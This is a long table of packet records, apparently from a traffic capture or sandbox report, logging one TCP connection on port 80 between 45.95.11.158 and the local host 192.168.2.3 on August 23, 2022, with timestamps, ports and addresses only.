Aug 23, 2022 18:23:57.658096075 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658114910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658149004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658200026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658200026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658272028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658282995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658289909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658332109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658381939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658396006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658409119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658436060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658446074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658488989 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658503056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658544064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658562899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658596992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658616066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658649921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658669949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658703089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658720970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658757925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658771992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658813953 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658824921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658868074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658886909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658919096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658934116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.658973932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.658992052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.659024000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.659039021 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.659097910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663194895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663233995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663260937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663288116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663315058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663343906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663383007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663408995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663414001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663418055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663445950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663470030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663497925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663501024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663518906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663525105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663546085 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663556099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663561106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663566113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663574934 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663603067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.663614988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663651943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663659096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.663665056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665492058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665528059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665585995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665585995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665602922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665616035 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665635109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665662050 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665755033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665798903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665824890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665848017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665853024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.665893078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665920019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.665968895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666007042 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666034937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666063070 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666063070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666073084 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666076899 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666079998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666083097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666086912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666119099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666129112 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666155100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666177034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666317940 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666409969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666438103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666466951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666568995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666579008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666641951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666714907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666776896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666779041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666829109 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666883945 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666909933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666933060 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666934967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666956902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.666968107 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666990995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.666996956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667020082 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667037010 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667042017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667078018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667083979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667130947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667131901 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667155027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667169094 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667180061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667196035 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667220116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667222023 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667265892 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667274952 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667318106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667371988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667397022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667418957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.667423010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667431116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.667464972 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.686249018 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.686284065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.686309099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.686316013 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.686342001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.686363935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.686492920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.686557055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691301107 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691370964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691395998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691412926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691418886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691435099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691440105 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691447020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691487074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691490889 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691572905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691608906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691627979 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691652060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691668034 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691689968 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691708088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691732883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691783905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691804886 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691828012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691834927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691848993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691857100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691869974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691875935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691891909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691906929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691912889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691935062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691939116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691950083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.691935062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.691992998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692001104 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692017078 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692037106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692038059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692050934 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692059994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692081928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692082882 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692095995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692111969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692132950 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692136049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692161083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692173958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692187071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692213058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692235947 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692239046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692254066 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692257881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692275047 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692292929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692562103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692584991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.692614079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.692625046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.693897009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.693922043 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.693965912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.693989992 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694641113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694664001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694701910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694725037 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694766998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694797039 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694813967 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694827080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694835901 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694878101 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694885015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694931030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.694968939 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.694998026 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.695013046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.695059061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.695061922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.695096016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.702382088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702418089 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702442884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702462912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702488899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702514887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.702516079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702533007 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.702548027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702569962 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.702574015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.702594995 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.702620983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.703257084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.703285933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.703331947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.703387022 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.703425884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.703445911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.703500986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.704281092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.704338074 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.704363108 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.704385042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.704519987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.704540014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.704562902 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.704586029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706372023 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706403017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706428051 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706444025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706445932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706471920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706471920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706497908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706505060 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706526041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706541061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706585884 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706585884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706617117 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706634045 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706644058 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706657887 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706671000 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706684113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706688881 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706718922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706789970 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706816912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706823111 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706830978 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706844091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706861019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.706866026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706883907 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706901073 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.706974030 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707016945 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707082033 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707107067 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707118034 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707124949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707149029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707166910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707168102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707210064 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707211018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707237005 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707252026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707256079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707276106 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707292080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707529068 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707559109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707575083 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707585096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707601070 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707602978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.707622051 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.707638025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708782911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.708811045 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.708836079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.708842039 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708853960 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.708865881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708884001 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708930969 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.708956957 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.708957911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708976984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708993912 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.708998919 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.709017992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.709043026 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.709043980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.709057093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.709079027 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.709108114 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.709112883 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.709126949 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.709144115 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.709173918 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.710853100 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.710886955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.710913897 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:23:57.710921049 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:23:57.710933924 CEST	80	49827	45.95.11.158	192.168.2.3
